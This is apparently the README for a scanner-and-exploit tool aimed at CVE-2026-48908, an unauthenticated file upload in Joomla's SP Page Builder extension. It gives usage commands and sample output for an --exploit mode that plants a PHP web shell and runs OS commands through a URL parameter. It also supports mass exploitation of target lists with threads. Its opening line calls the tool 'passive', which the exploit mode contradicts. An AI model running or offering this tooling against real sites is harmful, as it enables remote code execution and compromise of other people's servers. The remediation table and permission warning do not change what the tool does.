
SP Page Builder को प्रभावित करने वाले CVE-2026-48908 के लिए निष्क्रिय सुरक्षा जाँचकर्ता।
यह प्रोजेक्ट एक सुरक्षा अनुसंधान उपकरण है जिसे yora द्वारा Joomla के लिए SP Page Builder एक्सटेंशन में CVE-2026-48908 भेद्यता का पता लगाने और साबित करने के लिए विकसित किया गया है।
यह भेद्यता हमलावर को बिना प्रमाणीकरण के asset.uploadCustomIcon एंडपॉइंट के माध्यम से PHP फ़ाइल अपलोड करने की अनुमति देती है, जिसे बाद में सार्वजनिक निर्देशिका में निकाला जाता है और निष्पादित किया जा सकता है → रिमोट कोड निष्पादन (RCE)।
प्रभावित संस्करण: SP Page Builder 1.0.0 से 6.6.1 तक (6.6.2 में ठीक किया गया)।
⚠️ चेतावनी – इसका उपयोग केवल उन सिस्टम पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति है। बिना अनुमति के उपयोग अवैध है।
इस प्रोजेक्ट को विकसित और प्रबंधित किया गया है:
सुरक्षा समुदाय और स्वतंत्र शोध द्वारा समर्थित।
git clone https://github.com/yora1928/CVE-2026-48908-by-yora.git
cd CVE-2026-48908-by-yora
python -m pip install -r requirements.txt
requirements.txt:
requests>=2.28.0
python scanner.py --url https://target-website.com
उदाहरण आउटपुट:
[🔴 CONFIRMED] https://target-website.com
├─ SP detected
├─ v6.3.1
└─ Vulnerable version 6.3.1 and endpoint open
python scanner.py --url https://target-website.com --exploit
क्या होता है:
सफल आउटपुट का उदाहरण (वास्तविक परीक्षण से):
[*] Scanning: https://target-website.com
[*] Target confirmed vulnerable. Running adaptive exploit...
[*] Trying method: php -> EXECUTED
[🔴 CONFIRMED] https://target-website.com
├─ SP detected
├─ v6.3.1
└─ Vulnerable version 6.3.1 and endpoint open
└─ ✅ RCE confirmed via PoC upload!
Shell URL: https://target-website.com/media/com_sppagebuilder/assets/iconfont/icoyjdehd/fonts/fpqofpk.php?t=7f5e90gcxx0j0r51&c=<cmd>
Created dirs: media/com_sppagebuilder/assets/iconfont/icoyjdehd
Shell URL का उपयोग कैसे करें:
c पैरामीटर के साथ URL तक पहुंचें, जिसमें वह कमांड हो जिसे आप चलाना चाहते हैं।...?t=7f5e90gcxx0j0r51&c=whoami🔐 टोकन (
t=...) गुप्त है – शेल URL अनधिकृत लोगों के साथ साझा न करें।
एक targets.txt फ़ाइल बनाएं (प्रति पंक्ति एक URL):
https://site1.com
https://site2.com
चलाएं:
python scanner.py --list targets.txt --threads 5
एक्सप्लॉइट के साथ:
python scanner.py --list targets.txt --threads 5 --exploit
python scanner.py --url https://target.com --output reports/hasil.json
पूरा होने के बाद, बनाई गई निर्देशिकाओं को साफ करें:
python scanner.py --url https://target.com --exploit --cleanup
नोट:
--cleanupमैन्युअल रूप से चलाने के लिएrm -rfकमांड दिखाता है (क्योंकि लिखने की अनुमति सीमित हो सकती है)। यदि आपके पास FTP/SSH एक्सेस है, तोCreated dirsमें सूचीबद्ध निर्देशिकाओं को हटा दें।
scan_result.json फ़ाइल में एकत्रित सभी साक्ष्य शामिल हैं:
{
"scanner": "CVE-2026-48908 Scanner + Exploit",
"scan_time": "2026-08-13T10:30:00.123456+00:00",
"total_targets": 1,
"results": [
{
"target": "https://target.com",
"classification": {
"status": "CONFIRMED",
"confidence": "high",
"reasoning": ["Vulnerable version 6.3.1 and endpoint open"],
"evidence_summary": ["SP asset at /components/..."]
},
"exploit_result": {
"upload_success": true,
"access_success": true,
"shell_url": "https://target.com/media/.../fpqofpk.php?t=TOKEN&c=<cmd>",
"created_dirs": ["media/com_sppagebuilder/assets/iconfont/icoyjdehd"]
}
}
]
}
CVE-2026-48908-by-yora/
├── scanner.py # File utama (deteksi + exploit)
├── requirements.txt # Dependensi Python
├── README.md # Dokumentasi ini
├── SECURITY.md # Kebijakan keamanan dan pelaporan
├── LICENSE # Lisensi MIT
├── detection/ # (opsional) modul deteksi tambahan
├── poc/ # (opsional) PoC alternatif
└── reports/ # Tempat menyimpan hasil JSON (otomatis)
इस टूल का उपयोग करके, आप सहमत हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं।
यदि आपको कोई समस्या मिलती है या योगदान देना चाहते हैं, तो कृपया इस रिपॉजिटरी में Issue या Pull Request खोलें।
सुरक्षा रिपोर्ट के लिए, SECURITY.md में दिए गए दिशानिर्देशों का पालन करें।
यह प्रोजेक्ट MIT License के तहत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।
yora द्वारा ❤️ के साथ विकसित
| विशेषता | विवरण |
|---|
| 🔍 कंपोनेंट डिटेक्शन | विभिन्न स्रोतों (robots.txt, administrator, asset, HTML) से Joomla और SP Page Builder का पता लगाता है। |
| 📌 वर्जन फ़िंगरप्रिंट | CSS/JS, मेटा टैग और मैनिफ़ेस्ट फ़ाइल से SP Page Builder के संस्करण की पहचान करता है। |
| 🧪 एंडपॉइंट सत्यापन | बिना प्रमाणीकरण के asset.uploadCustomIcon तक पहुंच का परीक्षण करता है। |
| 📊 स्मार्ट वर्गीकरण | परिणामों को कारण और विश्वास स्तर के साथ CONFIRMED / LIKELY / NOT_VULNERABLE / UNKNOWN में वर्गीकृत करता है। |
| 🚀 अनुकूली एक्सप्लॉइट | यदि --exploit उपयोग किया जाता है, तो टूल RCE को सुरक्षित रूप से साबित करने के लिए विभिन्न PHP एक्सटेंशन (.php, .php3, .phtml, .PHP, आदि) और .htaccess आज़माता है। |
| 📁 JSON आउटपुट | ऑडिट और रिपोर्ट के लिए सभी साक्ष्य .json फ़ाइल में संग्रहीत किए जाते हैं। |
| ⚡ मल्टी-थ्रेडिंग | --list और थ्रेड सेटिंग के साथ एक साथ कई टारगेट स्कैन करें। |
| 🧹 क्लीनअप | --cleanup अपलोड की गई आर्टिफैक्ट्स को हटाने के लिए कमांड दिखाता है। |
| स्थिति | अर्थ | अनुशंसित कार्रवाई |
|---|
| 🔴 CONFIRMED | SP Page Builder मौजूद है, असुरक्षित संस्करण (≤ 6.6.1) है, और asset.uploadCustomIcon एंडपॉइंट बिना प्रमाणीकरण के एक्सेस किया जा सकता है। असुरक्षित। | SP Page Builder को तुरंत 6.6.2 या उससे नए संस्करण में अपडेट करें। यदि --exploit का उपयोग किया गया है, तो अपलोड की गई आर्टिफैक्ट्स हटा दें। |
| 🟡 LIKELY | SP मौजूद है, संस्करण असुरक्षित है, लेकिन एंडपॉइंट की प्रमाणीकरण स्थिति की पुष्टि नहीं की जा सकी है। संभवतः असुरक्षित। | बिना लॉगिन के index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon एंडपॉइंट तक पहुंचकर मैन्युअल सत्यापन करें। यदि यह लॉगिन पर रीडायरेक्ट नहीं होता है, तो यह असुरक्षित है। |
| 🟢 NOT_VULNERABLE | SP Page Builder का संस्करण ≥ 6.6.2 (पहले से ठीक) मौजूद है। सुरक्षित। | कोई और कार्रवाई आवश्यक नहीं है। |
| ⚪ UNKNOWN | SP Page Builder मौजूद नहीं है, या संस्करण की पहचान नहीं की जा सकती है, या डेटा अपर्याप्त है। | मैन्युअल रूप से जांचें कि SP Page Builder इंस्टॉल है या नहीं। यदि हाँ, तो /administrator/components/com_sppagebuilder/ में sppagebuilder.xml फ़ाइल के माध्यम से संस्करण का पता लगाने का प्रयास करें। |
| ❌ ERROR | कनेक्शन त्रुटि या टाइमआउट हुआ। | इंटरनेट कनेक्शन, फ़ायरवॉल की जांच करें, या --timeout 60 के साथ टाइमआउट बढ़ाने का प्रयास करें। |